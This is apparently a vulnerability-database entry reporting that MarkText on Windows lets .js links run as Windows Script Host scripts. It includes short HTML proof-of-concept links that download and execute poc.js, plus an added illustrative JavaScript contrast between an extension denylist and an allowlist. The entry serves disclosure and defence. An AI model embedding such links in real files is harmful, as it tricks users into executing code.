| Title | MarkText on Windows doesn't filter WSH JScript, which may cause code execution |
|---|
| Description | Although MarkText filters most dangerous suffixes, it still retains the .js file, which will be recognized as WSH (Windows Script Host) JScript on the Windows operating system. Users who click on an evil markdown file may cause code execution.
Version: 0.17.1 (latest)
PoC
Local
<a href="poc.js">Click me to execute JScript</a>
Remote
<a href="http://127.0.0.1:8000/poc.html" download="poc.js">1.Click me to download JScript</a>
<a href="./poc.js">2.Click me to execute JScript</a>
For more details, please click the announcement. |
|---|
| Source | ⚠️ https://github.com/marktext/marktext/issues/3575 |
|---|
| User | Tom23 (UID 41413) |
|---|
| Submission | 02/20/2023 13:15 (3 years ago) |
|---|
| Moderation | 02/24/2023 08:56 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221737 [MarkText up to 0.17.1 on Windows WSH JScript code injection] |
|---|
| Points | 20 |
|---|
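
The description above reports a suffix filter that still lets `.js` through. The following is an added example, not MarkText's code and not part of the submission, that contrasts a denylist check with an allowlist check for links an editor hands to the operating system. The function names and both extension lists are assumptions constructed for illustration.

```javascript
// Constructed denylist for illustration (NOT MarkText's actual list).
const DENYLIST = new Set(['.exe', '.bat', '.cmd', '.com', '.msi', '.ps1', '.vbs', '.scr']);
// Allowlist: only what a markdown editor has a reason to open (assumed set).
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
const SAFE_LOCAL_EXT = new Set(['.md', '.markdown', '.txt', '.png', '.jpg', '.gif', '.pdf']);

// Extension of a local link target, normalized the way Windows resolves names.
function localExtension(href) {
  let p = decodeURIComponent(href.split(/[?#]/)[0]); // throws on malformed %xx
  p = p.replace(/[. ]+$/, '');           // Windows ignores trailing dots and spaces
  const base = p.split(/[\\/]/).pop();   // last path component
  const dot = base.lastIndexOf('.');
  return dot > 0 ? base.slice(dot).toLowerCase() : '';
}

// Denylist: anything not explicitly listed is opened, so a forgotten
// script type (here .js, run by Windows Script Host) passes the filter.
function denylistAllows(href) {
  return !DENYLIST.has(localExtension(href));
}

// Allowlist: web links go to the browser, local targets are opened only
// when their extension is a known document type, everything else is blocked.
function allowlistDecision(href) {
  let url = null;
  try { url = new URL(href); } catch { /* relative path, handled below */ }
  // A one-letter "scheme" such as c: is a Windows drive letter, not a URL scheme.
  if (url && url.protocol.length > 2 && url.protocol !== 'file:') {
    return SAFE_SCHEMES.has(url.protocol) ? 'browser' : 'block';
  }
  try {
    return SAFE_LOCAL_EXT.has(localExtension(href)) ? 'open' : 'block';
  } catch {
    return 'block'; // undecodable path: refuse rather than guess
  }
}

// Constructed sample links, including the two local targets from the PoC.
for (const href of ['poc.js', './poc.js', './POC.JS.', 'notes.md',
                    'setup.exe', 'https://example.com/', 'javascript:alert(1)']) {
  console.log(href.padEnd(24), 'denylist allows:', denylistAllows(href),
              '| allowlist:', allowlistDecision(href));
}
```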